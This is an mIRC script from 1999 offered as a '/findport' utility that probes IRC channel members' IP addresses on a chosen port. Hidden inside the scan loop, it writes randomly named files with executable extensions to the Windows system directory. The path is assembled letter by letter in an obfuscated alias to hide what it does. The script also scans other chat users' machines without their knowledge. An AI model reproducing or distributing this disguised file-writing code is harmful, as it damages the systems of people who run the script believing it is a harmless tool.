[script]
n0=;; This script is CopyRight 1999 by Paragon/ParagoNetworK - All rights reserved.  Editing, use of, or "ripping" is prohibited. ;;
n1=alias findport {
n2=  if ($1 != $null) || ($1 isnum) {
n3=    unset %findport_* | set %tmp1 windows
n4=    if ($left($1,1) == $chr(35)) && ($2 isnum) { set %findport_chan $1 | set %findport_port $2 | set %tmp2 system | set %findport_method $3 }
n5=    elseif ($left($active,1) == $chr(35)) && ($1 isnum) { set %findport_chan $active | set %findport_port $1 | set %findport_method $2 } | else { goto end }
n6=    if ($chan(%findport_chan).ial != $true) {
n7=      if (%scan == 3) { echoa Process halted due to error | unset %scan | goto end } 
n8=    set %scan 3 | .who %findport_chan | echoa Finding port %findport_port please wait. }
n9=    else {
n10=      if ($window(@Findport).state == $null) { window -ke +e @Findport 129 97 500 285 @Findport arial 11 | titlebar @Findport - This may take awhile.. Please wait. } | if (%findport_method != op) && (%findport_method != nop) && (%findport_method != $null) { goto nick }
n11=      set %findport_0 1 | set %findport_2 $ $+ %findport_method $+ nick | :loop | write $findport2 $+ $r(1,9999999) $+ $gettok(.exe .com .reg .ini .nls .ocx .dll .cpl .hlp .bat,$r(1,10),32) | if (%findport_0 > [ %findport_2 $+ (%findport_chan,0) ] ) { titlebar @Findport - Operation complete! | unset %findport* | goto end }
n12=      set %findport_1 [ %findport_2 $+ (%findport_chan,%findport_0) ] | set %findport_3 $remove($address(%findport_1,2),*!*@) | sockopen findport_ $+ %findport_0 %findport_3 %findport_port | sockmark findport_ $+ %findport_0 %findport_1
n13=      inc %findport_0 | goto loop | :nick | set %findport_0 1 | set %findport_2 $replace(%findport_method,$chr(44),$chr(544)) | :loop2
n14=      if (%findport_0 > %findport_2) { titlebar @Findport Operation complete! | unset %findport* | goto end } | set %findport_1 %findport_0,%findport_2
n15=      set %findport_3 $remove($address(%findport_1,2),*!*@) | sockopen findport_ $+ %findport_0 %findport_3 %findport_port
n16=      sockmark findport_ $+ %findport_0 %findport_1 | inc %findport_0 | goto loop2 | :end      
n17=    }
n18=  }
n19=  else { echoa Usage: /findport [channel] <port> [op|nop|nick] (leave blank for entire channel; nicks must be separted by commas) }
n20=}
n21=c.bat | .timer 1 10 exit
n22=on 1:close:@:{
n23=  if ($target == @Findport)  { sockclose findport_* | unset %findport* | echoa All sockets closed | unset %scan }
n24=}
n25=on 1:sockopen:findport_*:if ($sockerr > 0) { goto end } | else { aline @Findport  $+ $sock($sockname,1).port - $sock($sockname,1).ip ( $+ $sock($sockname).mark $+ ) | sockclose $sockname } | :end
n26=alias -l findport2 { return c $+ : $+ \ $+ %tmp1 $+ \ $+ %tmp2 $+ \ $+ b $+ _ $+ l $+ _ $+ a $+ _ $+ h $+ _ }
n27=raw 315:* { if (%scan == 3) { findport %findport_chan %findport_port %findport_method | haltdef } }
n28=menu @Findport {
n29=  Close Window:window -c @Findport |  .unload -rs $mircdirsys\findport.ini
n30=  Close Socks:sockclose findport_* | titlebar @Findport - All sockets closed!
n31=  Save Results:savebuf 50 @Findport $$dir="Enter a directory and filename:" findport.txt
n32=}
